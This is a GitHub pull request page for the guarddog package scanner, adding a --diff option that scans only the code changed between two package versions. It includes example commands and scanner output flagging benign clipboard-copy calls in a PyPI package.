guarddog icon indicating copy to clipboard operation
guarddog copied to clipboard
verified publisher icon DataDog

Add diff scanning option

Open ikretz opened this issue 8 months ago • 0 comments

This PR adds a --diff option to the scan subcommand:

$ guarddog pypi scan requests --diff 2.32.2
$ guarddog npm scan /tmp/axios_1.8.4 --diff /tmp/axios_1.8.3.tar.gz

This will perform source code analysis only on the code changes that exist between the two selected package versions. Clearly, these results are only meaningful when different versions of the same package are compared.

Example:

$ guarddog pypi scan llm-code-lens --version 0.5.3
Found 3 potentially malicious indicators in llm-code-lens

clipboard-access: found 3 source code matches
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:465
        pyperclip.copy(full_message)
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:477
        pyperclip.copy(full_message)
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:489
        pyperclip.copy(full_message)

$ guarddog pypi scan llm-code-lens --version 0.5.2
Found 3 potentially malicious indicators in llm-code-lens

clipboard-access: found 3 source code matches
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:465
        pyperclip.copy(full_message)
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:477
        pyperclip.copy(full_message)
  * This package accesses the clipboard, which can indicate it's trying to steal sensitive data or overwrite cryptocurrency addresses at llm_code_lens/cli.py/llm_code_lens/cli.py:489
        pyperclip.copy(full_message)

$ guarddog pypi scan llm-code-lens --version 0.5.3 --diff 0.5.2
Found 0 potentially malicious indicators scanning llm-code-lens

Diff scanning is available for the PyPI, npm and Go ecosystems. There are no plans to try to extend it to GitHub Actions.

The PR also adds and updates tests to accommodate the new feature and updates all dependencies to their latest compatible versions.

ikretz avatar Apr 07 '25 10:04 ikretz